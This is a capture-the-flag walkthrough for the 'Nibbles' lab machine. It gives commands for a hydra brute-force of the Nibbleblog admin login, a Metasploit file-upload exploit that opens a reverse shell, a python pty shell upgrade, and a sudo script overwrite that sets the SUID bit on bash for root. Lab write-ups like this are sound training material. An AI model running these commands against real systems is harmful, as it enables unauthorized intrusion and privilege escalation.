# Nibbles
># 10.10.10.75

Nmap
>PORT   STATE SERVICE VERSION
[22/tcp ](portscan.md#22)open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
[80/tcp](portscan.md#80) open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).



The webpage on port 80 is pretty useless, as you can see there's not much.
![[nibbles2.png]]
Using the view-source tool (or the inspect page) we find a hint:
![[nibbles1.png]]
And the [web page](http://10.10.10.75/nibbleblog) here looks like this
![[nibbles4.png]]

Using the usual webenumerator we can find 3 **relevant** result:
![[nibbles3.png]]
 * [/nibbleblog/content](http://10.10.10.75//nibbleblog/content)
 > lead us to : [users.xml](/nibbleblog/content/private/users.xml) which leak the user called: admin
* [/nibbleblog/admin.php](http://10.10.10.75/nibbleblog/admin.php)
> login page
* [/nibbleblog/README](http://10.10.10.75/nibbleblog/README)
> says it's version 4.0.3 of nibbleblog

Google suggest a metasploit module for a reverse shell exploit via unsecured file upload from authenticated user.
We have a name but not a password.
You can't allow your self to be lazy unless you know some tricks or tools... like [hydra](hydra.md#hydra).
```bash
hydra -l admin -P /opt/wordlists/rockyou.txt -v 10.10.10.75 http-post-form '/nibbleblog/admin.php:username=^USER^&password=^PASS^:F=Incorrect username or password' 
```
The bad news is that will return 16 positive result and none of them is correct.
Harder enumeration won't lead to nothing. 
Manual attempt is the way but there's a black list after 5(not sure about this number sorry) attempts.
It's a try and error login and i hate this. It kills all the fun. 
After 2 resets i got the password: **nibbles**
2 resets cause i've tried all the default password first.

Anyway: 
```
admin@nibbles
```
Grant the access to the admin panel 
![[nibbles5.png]]

Now we can switch to the [exploit](https://www.rapid7.com/db/modules/exploit/multi/http/nibbleblog_file_upload/) that google suggested in first place:
>use multi/http/nibbleblog_file_upload
>set lhost tun0
>set rhost 10.10.10.75
>set targeturi /nibbleblog/
>set username admin
>set password nibbles
>exploit

Now that we're in (we can already grab the flag) we want to do a small power up to our shell cause it sucks to use sh so let's see with which [tools](Shell.md#sh_to_bash) we can fire up bash:
```bash
/bin/bash #won't give any result

#check for python version installed:
which python #no result
which python3 
#>/usr/bin/python3
#let's go with py3 then
python3 -c 'import pty; pty.spawn("/bin/bash");'
#>nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$
#we good now.
```
![[nibbles8.png]]

The first thing to do as always in a Linux machine where we need to elevate our privilege is to check if we're allowed to run something as super user, aka root, and the command to do that is as always:
```bash
sudo -l
#>(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```
![[nibbles9.png]]
We're authorized to run a **.sh** script, could be any better?
Let's go and take a look at that file.
We can't check it out right away cause it's in a zip folder in the /home/nibbler directory, we need to unzip it first:
```bash
unzip personal
```
![[nibbles10.png]]
And now we can get to the file in the allowed path.

Checking the content of **monitor.sh** we get to the immediate conclusion that this is a random gigantic script that i'm not willing to read and understand if i'm not **REALLY** required to.
Work smarter not harder:
With 
```bash
ls -la 
```
we can see that we have the rwx (read, write and execute) permission  on the file and this means that we are allowed to modify it and run it.
```bash
#we're overwriting his content with a command that add the
#suid bit to the bash program
echo "sudo chmod +s /bin/bash" > monitor.sh
```
![[nibbles11.png]]
[[suid note](suid.md)]
 
 Now that the script contains the code that we need we only need to run it as sudo and set the suid flag:
```bash
#run it with sudo and use the full path or it will ask for the 
#user password cause the relative path it's not an allowed one.
sudo -u root /home/nibbler/personal/stuff/monitor.sh
#now we have the suid flag active
bash -p 
#and we're root.
``` 
 ![[nibbles12.png]]
Here we go.
#machine #sudo #suid #msfvenom